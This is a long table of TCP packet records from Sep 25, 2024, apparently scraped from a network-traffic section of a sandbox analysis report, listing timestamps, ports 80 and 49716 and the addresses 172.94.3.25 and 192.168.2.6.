                                        Sep 25, 2024 18:40:30.139204025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139205933 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139215946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139229059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139229059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139240980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139251947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139256954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139270067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139272928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139297962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139305115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139317036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139352083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139708996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139731884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139744043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139753103 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139784098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139857054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139869928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139882088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139894962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139914036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139945984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139998913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140010118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140022993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140038967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140044928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140052080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140063047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140075922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140077114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140088081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140094042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140100002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140124083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140211105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140221119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140233994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140245914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140252113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140258074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140280962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140299082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140675068 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140717030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140729904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140757084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140790939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140803099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140815020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140826941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140827894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140846968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140898943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140909910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140922070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.140934944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.140961885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141216040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141226053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141238928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141266108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141289949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141300917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141311884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141324043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141330004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141357899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141495943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141506910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141519070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141530991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141531944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141544104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141555071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141560078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141566992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141578913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141591072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141591072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141614914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141629934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141633034 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141640902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141659021 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141669989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141670942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.141683102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.141704082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142132044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142173052 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142179966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142191887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142218113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142272949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142283916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142294884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142313957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142329931 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142354965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142421961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142432928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142457962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142467976 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142468929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142479897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142492056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142499924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142503977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142517090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142528057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142529964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142548084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142599106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142611027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142632961 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142669916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142682076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142693996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.142704964 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.142728090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143112898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143158913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143172026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143203974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143227100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143239021 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143250942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143270969 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143295050 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143327951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143338919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143351078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143363953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143373013 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143400908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143583059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143594980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143606901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143647909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143711090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143723011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143735886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143747091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143748045 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143774986 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143863916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143874884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143892050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143898964 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143903971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143915892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143929005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143929958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143940926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143945932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.143950939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143964052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.143976927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144000053 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144006014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144016981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144028902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144041061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144045115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144052982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144078016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144573927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144587040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144599915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144613028 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144634008 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144645929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144656897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144670010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144685984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144697905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144716978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144804001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144814014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144824028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144834995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144841909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144845963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144857883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144869089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144880056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144886971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144891977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144910097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.144967079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144978046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144989014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.144999981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145003080 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145013094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145035982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145050049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145493031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145519972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145533085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145556927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145565033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145602942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145615101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145632982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145643950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145663977 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145677090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145689011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145701885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.145720005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.145745993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146017075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146028042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146042109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146065950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146089077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146100044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146112919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146123886 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146125078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146146059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146226883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146236897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146243095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146249056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146259069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146271944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146286011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146290064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146306038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146317005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146322966 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146359921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146392107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146404028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146414042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146434069 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.146437883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146450996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.146480083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148186922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148200035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148211956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148232937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148235083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148245096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148252964 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148257971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148268938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148281097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148308992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148310900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148319960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148333073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148350954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148462057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148473024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148483038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148499966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148513079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148519993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148525000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148535967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148545027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148547888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148561001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148587942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148610115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.356106043 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362185955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362212896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362225056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362303972 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362344980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362355947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362366915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362380028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362391949 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362409115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362481117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362492085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362509012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362520933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362529993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362531900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362554073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362557888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362565994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362574100 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362576962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362590075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362607002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362632036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362642050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362653017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362664938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362678051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362699032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362731934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362838984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362850904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362863064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362874985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362880945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362886906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362898111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362904072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362910032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362921000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362932920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362937927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362951994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363105059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363116026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363126993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363138914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363146067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363149881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363162041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363171101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363188982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363431931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363470078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363495111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363507032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363519907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363538980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363636971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363647938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363660097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363671064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363677979 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363683939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363697052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363708019 CEST4971680192.168.2.6172.94.3.25
